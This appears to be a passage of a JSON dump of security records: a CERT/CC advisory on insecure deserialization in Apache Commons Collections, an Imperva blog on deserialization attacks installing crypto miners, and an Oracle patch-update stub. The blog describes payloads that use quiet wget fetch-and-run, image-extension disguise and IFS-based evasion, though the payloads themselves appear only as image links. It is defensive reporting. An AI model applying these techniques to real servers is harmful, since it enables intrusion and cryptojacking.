\n**Apply an update** \n \nApache Commons Collections [version 3.2.2](<https://commons.apache.org/proper/commons-collections/download_collections.cgi>) and [version 4.1](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>) has been released. These new releases mitigate the vulnerability by disabling the insecure functionality. \n \n**Developers need to re-architect their applications, and should be suspicious of deserialized data from untrusted sources** \n \nDevelopers will need to make further architectural changes to secure their applications before they can re-enable functionality in ACC version 3.2.2 and later. From Apache's statement: \n \n_However, to be clear: this is not the only known and especially not unknown useable gadget. So replacing your installations with a hardened version of Apache Commons Collections will not make your application resist this vulnerability. _ \n \nDevelopers should in general be very suspicious of deserialized data from an untrusted source. For best practices, see the [CERT Oracle Coding Standard for Java](<https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>) guidelines for Serialization, especially rules [SER12-J](<https://www.securecoding.cert.org/confluence/display/java/SER12-J.+Prevent+deserialization+of+untrusted+classes>) and [SER13-J](<https://www.securecoding.cert.org/confluence/display/java/SER13-J.+Treat+data+to+be+deserialized+as+potentially+malicious+by+default>). \n \n**Use firewall rules or filesystem restrictions** \n \nSystem administrators may be able to mitigate this issue for some applications by restricting access to the network and/or filesystem. If an affected application, such as Jenkins, utilizes an open port accepting serialized objects, restricting access to the application may help mitigate the issue. \n \n--- \n \n### Vendor Information\n\n576313\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Apache Software Foundation\n\nUpdated: November 10, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Cisco\n\nUpdated: July 18, 2017 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nCisco has released a [security advisory](<http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>) and list of affected products at the URL below. Cisco has assigned CVE-2015-6420 to this issue.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n\n### Addendum\n\nAs of 2017-07-18, CERT/CC is aware of a report that Cisco Unity Express (CUE) 8.6.1 is still vulnerable to this issue and is incorrectly identified as \"not vulnerable\" in the above Cisco advisory. We have reached out to Cisco for clarification.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23576313 Feedback>).\n\n### __ __ IBM Corporation\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nIBM has released a security advisory for WebSphere at the following URL:\n\n### Vendor References\n\n * <http://www-01.ibm.com/support/docview.wss?uid=swg21970575>\n\n### __ __ Jenkins\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nJenkins has released a security advisory at the URL below. CVE-2015-8103 was assigned this issue in Jenkins.\n\n### Vendor References\n\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n\n### __ __ Oracle Corporation\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nOracle has released a security advisory at the URL below:\n\n### Vendor References\n\n * [http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 ](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179\n>)\n * <https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852>\n\n### __ __ Unify Inc\n\nUpdated: November 30, 2015 \n\n**Statement Date: November 24, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"Unify is affected in two product lines as listed below. For details refer to the information given in the Security Advisory OBSO-1511-01.\n\nWe recommend all customers to apply the mitigations described in the advisory and install the corresponding product fix releases as soon as available. \nTo get notified about Advisory updates, subscribe as listed in `<https://www.unify.com/security/advisories>`.\"\n\n### Vendor Information\n\nUnify has issued Security Advisory OBSO-1511-01 at the URL listed below. \n \nMitre had assigned two CVE IDs for Unify products impacted by VU#576313: \n \nCVE-2015-8237, affected products: \nUnify OpenScape Fault Management V7 (\"cpe:/a:unify:openscape_fault_management:7.%02\") \nUnify OpenScape Fault Management V8 (\"cpe:/a:unify:openscape_fault_management:8.%02\") \n \nCVE-2015-8238, affected products: \nUnify OpenScape UC Application V7 (\"cpe:/a:unify:openscape_uc_application:7.%02\") \nUnify OpenScape Common Management Platform V7 (\"cpe:/a:unify:openscape_common_management_platform:7.%02\")\n\n### Vendor References\n\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n\n### __ __ Red Hat, Inc.\n\nUpdated: November 30, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nJBOSS has been reported as being affected.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.4 | E:POC/RL:W/RC:C \nEnvironmental | 6.4 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread>\n * <https://issues.apache.org/jira/browse/COLLECTIONS-580>\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization>\n * <https://networks.unify.com/security/advisories/OBSO-1511-01.pdf>\n * [http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 ](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?elq_mid=31793&sh=&cmid=WWSU12091612MPP001C179 >)\n * <https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11>\n * <http://www.openwall.com/lists/oss-security/2015/11/11/3>\n * <http://www.infoq.com/news/2015/11/commons-exploit>\n * <https://tersesystems.com/2015/11/08/closing-the-open-door-of-java-object-serialization/>\n * <http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/>\n * <http://mail-archives.apache.org/mod_mbox/commons-dev/201511.mbox/%3c20151106222553.00002c57.ecki@zusammenkunft.net%3e>\n * <http://frohoff.github.io/appseccali-marshalling-pickles/>\n * <http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles>\n * <https://www.youtube.com/watch?v=VviY3O-euVQ>\n * <https://commons.apache.org/proper/commons-collections/>\n * <http://cwe.mitre.org/data/definitions/502.html>\n * <https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>\n * <http://www.oracle.com/technetwork/java/seccodeguide-139067.html#8>\n\n### Acknowledgements\n\nThis type of vulnerability was reported publicly by Gabriel Lawrence and Chris Frohoff, and later investigated by Stephen Breen.\n\nThis document was written by Garret Wassermann with assistance from David Svoboda and the CERT Secure Coding team.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-6420](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6420>) \n---|--- \n**Date Public:** | 2015-01-28 \n**Date First Published:** | 2015-11-13 \n**Date Last Updated: ** | 2018-08-27 17:57 UTC \n**Document Revision: ** | 88 \n", "modified": "2018-08-27T17:57:00", "published": "2015-11-13T00:00:00", "id": "VU:576313", "href": "https://www.kb.cert.org/vuls/id/576313", "type": "cert", "title": "Apache Commons Collections Java library insecurely deserializes data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2018-01-25T09:59:26", "bulletinFamily": "blog", "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.\n\nOther types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>) and rightfully so as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805\n\n | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. \nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in the Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No \nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No \nCVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMPQ | No | CVE-2015-4852 | Oracle WebLogic | Yes \nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Congnos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. Also, we saw some attacks related to serialization to XML and other formats, see Figure 4.\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request\u2019s body using a serialized Java object through XML representation.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. Few interesting notes can be made examining this command:\n\n * The existence of shell and \u201cwget\u201d commands indicate that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d, this means that \u201cwget\u201d will have no output to the console, hence it will be harder to note that such a request was even made. Once the downloaded script runs the server is infected with a crypto mining malware trying to mine Monero digital coins (a crypto currency similar to Bitcoin).\n\nThe next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and Powershell commands to download the malware and run it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)\n\n_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_\n\nThis indicates that there are two different infection methods for Windows and Linux server, each system with its designated script.\n\nAnother example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)\n\n_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_\n\nThe \u201cbad\u201d encoding is an artifact of Java serialization, where the object is represented in the byte stream.\n\nStill, we can see a script in plain text marked in yellow. Shown as an image below is a variable that defines an internal field separator, where in this case it is just a variable for space. The variable is probably used instead of a space to try to make the payload harder to detect.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)\n\nJust as in the previous examples, this Bash script targets Linux servers that send an HTTP request using \u201cwget\u201d to download a crypto miner.\n\n## Beyond Insecure Deserialization\n\nThe common denominator of the attacks above is that attackers are trying to infect the server with a crypto mining malware by using an insecure deserialization vulnerability. However insecure deserialization is not the only method to achieve this goal.\n\nBelow (Figure 8) we see an example of another attack payload, this time at the \u201cContent-Type\u201d header.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)\n\n_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_\n\nThis attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).\n\nWhen it was originally published we saw no indications of crypto miners in the attacks\u2019 payloads related to this CVE, and most of the payloads were reconnaissance attacks.\n\nHowever, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. Using the same remote server and the exact same script, it infected the server with crypto mining malware.\n\nThis old attack method with a new payload suggests a new trend in the cyber arena \u2013 attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their \u201ceffort\u201d.\n\n## Recommendations\n\nGiven the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.\n\nAn alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.\n\nA WAF that provides virtual patching doesn\u2019t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.\n\nLearn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).", "modified": "2018-01-24T17:45:08", "published": "2018-01-24T17:45:08", "id": "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "href": "https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/", "type": "impervablog", "title": "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2019-05-29T18:20:50", "bulletinFamily": "software", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to: \n\n * [Critical Patch Updates, Security Alerts and Bulletins](<http://www.oracle.com/securityalerts>) for information about Oracle Security Advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 334 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2018 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2420273.1>).\n\nMany industry experts anticipate that exploits leveraging known flaws in modern processor designs will continue to be disclosed for the foreseeable future (i.e., \"Spectre\" variants). For information related to these issues, please refer to:\n\n * the January 2018 Critical Patch Update (and later) Advisories,\n * the \"Addendum to the January 2018 Critical Patch Update Advisory for Spectre (CVE-2017-5715, CVE-2017-5753) and Meltdown (CVE-2017-5754)\" ([Doc ID 2347948.1](<https://support.oracle.com/rs?type=doc&id=2347948.1>)), and\n * \"Information about processor vulnerabilities CVE-2018-3640 (\"Spectre v3a\") and CVE-2018-3639 (\"Spectre v4\")\" ([Doc ID 2399123.1](<https://support.oracle.com/rs?type=doc&id=2399123.1>)).\n\n \n", "modified": "2018-10-12T00:00:00", "published": "2018-07-17T00:00:00", "id": "ORACLE:CPUJUL2018-4258247", "href": "", "title": "CPU July 2018", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
